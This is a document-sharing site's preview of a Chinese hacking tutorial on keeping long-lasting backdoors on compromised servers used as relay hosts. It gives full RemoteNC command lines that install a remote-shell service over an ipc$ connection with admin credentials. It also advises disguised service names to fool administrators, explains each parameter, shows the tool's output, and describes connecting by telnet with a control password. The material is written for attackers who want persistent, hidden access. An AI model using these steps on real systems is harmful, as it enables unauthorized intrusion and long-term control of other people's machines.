返回
做尽可能久的后门

做尽可能久的后门

ID:14226396

大小:61.00 KB

页数:27页

时间:2018-07-27

做尽可能久的后门_第1页
做尽可能久的后门_第2页
做尽可能久的后门_第3页
做尽可能久的后门_第4页
做尽可能久的后门_第5页
资源描述:

《做尽可能久的后门》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、做尽可能久的后门一、利用长久服务:前段时间做了一些肉鸡做跳板,辛辛苦苦上传了很多文件,但使用不到几天就被K了,漏洞也补上了,后来干脆不用跳板了!结果警告来了!痛定思痛!如何在肉鸡上留下后门达到长期使用的目的呢?今天早上在网上找了一早,也没有找出什么有用的东西!还是自己动手吧!我门通常使用nc,ncx,netcat等东西来开后门,但这些后门只是临时的,,主要用于得到Admin权限,能不能留下长期的后门呢?能!我在这里介绍的只是如何制作后门,不打算介绍如何得到Admin权限!至于如何得到Admin,方法很多!U,SQL,溢出、i

2、pc管道、暴力…………单有一点是肯定的,要留后门,必须有Admin权限。我打算介绍用两种方法,确切的说是用两个软件!第一:用小榕的remotenc。第二,用NTShell1.0Beta,这两个软件的共同点是都能作为服务运行在远端服务器上!我使用下来感觉差不多!不过ntshell的功能远不止开后门,呵呵!很强大的工具!可以得到asp文件!这对想破江湖的人可是…………再强调一点,one:太容易进入的主机不要作自己的跳板(除非你进去后留下后门把漏洞给补上)two:速度太慢和小型http服务器不要作自己的跳板。three:进入得到A

3、dmin权限后接下来要作的事:留后门--》做代理(就是snake的那个)--》补漏洞以上三点属个人意见,供参考!好了,说了半天的废话,我们开始用小榕的remotenc做我们的第一个跳板!假设我们已经得到192.168.0.1的admin权限,user:hackpassword:123,并且192.168.0.1支持ipc$远程连接!(呵呵!废话!不能连接怎么作跳板!)在自己c:hack下有remotenc,好,开始c:hackremotenc192.168.0.1hack123runasuser"RemoteNC""P

4、rovideLocalCMDRedirect"791888解释:remotenc目标主机用户名密码启动模式"服务名称""服务说明"监听的端口控制密码/overwrite(注:可以不加该参数)其中:用户名必须是admin权限启动模式有runasuser和localsystem两种(建议用runasuser模式,如果runasuser模式失败就用localsystem模式)服务说明是启动后显示在服务管理器中的说明,为了迷惑管理员,建议不要用“hack”之类监听的端口是remotenc作为服务启动以后开的监听端口,可以是7、8等,

5、但不要是21、23、25、80等控制密码:你telnet(或者ntshell)到监听端口后需要的密码,也就是你对remotenc的控制密码。(这里就不要要了哈!别这么小气三)/overwrite覆盖已经安装的remotenc(不要覆盖我的哈)回车后出现如下信息:=======RemoteNCBeta4,WrittenbyAssassin2001=======http://www.netXeyes.comhttp://www.netXeyes.org[InstallServiceasRunasUserMode]Connecti

6、ng192.160.0.1.....Done.TransfferFile.....Done.StartService.....Done.NowYoucanTelnet192.168.0.1toConnect,HaveaJoy也可能出现:=======RemoteNCBeta4,WrittenbyAssassin2001=======http://www.netXeyes.comhttp://www.netXeyes.org[InstallServiceasRunasUserMode]Connecting192.168.0.1

7、.....Done.TransfferFile.....Done.StartService.....ServiceExsited,1206Failed.这是启动服务失败这是可以把安装模式换为localsystem,即c:hackremotenc192.168.0.1hack123localsystem"RemoteNC""ProvideLocalCMDRedirect"791888就能安装成功!如果出现第一中情况,祝贺你,然后MicrosoftTelnet>open192.168.0.17正在连接到192.168.0.1

8、7...然后出现:RemoteNCControlPassword:(这里输入你的控制密码91888)然后出现:RemoteNCControlPassword:*********===============BanyetSoftLabs.1995-2001AllRightsReserved.

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。